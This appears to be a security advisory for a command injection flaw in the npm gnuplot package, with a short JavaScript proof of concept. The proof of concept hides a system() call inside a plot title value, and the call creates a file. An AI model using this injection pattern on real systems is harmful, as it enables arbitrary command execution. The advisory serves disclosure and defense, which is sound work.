Command Injection in gnuplot

All versions of gnuplot are vulnerable to Command Injection. The package fails to sanitize plot titles, which may allow attackers to execute arbitrary code in the system if the title value is supplied by a user. The following proof-of-concept creates a testing file in the current directory:

var gnuplot = require(&#039;gnuplot&#039;);

const title = &#039;&quot;\nset title system(&quot;touch testing&quot;)\n#&#039;;

gnuplot()
.set(&#039;term png&#039;)
.set(&#039;output &quot;out.png&quot;&#039;)
.set(`title &quot;${title}&quot;`)
.set(&#039;xrange [-10:10]&#039;)
.set(&#039;yrange [-2:2]&#039;)
.set(&#039;zeroaxis&#039;)
.plot(&#039;(x/4)**2, sin(x), 1/x&#039;)
.end();

Recommendation

No fix is currently available. Consider using an alternative package until a fix is made available.

Published: Sep 4, 2020
Updated: Apr 14, 2023
GHSA: GHSA-cfwc-xjfp-44jg
Severity: Critical
Exploit:

No technical information available.

CWEs:

CWE-77

OWASP TOP 10:

A1 - Injection

Affected Software
References

Software	From	Fixed in
@rkesters / gnuplot	0.0.0	-

https://www.npmjs.com/advisories/1440

Vulnerability Database

290,206

Command Injection in gnuplot

Recommendation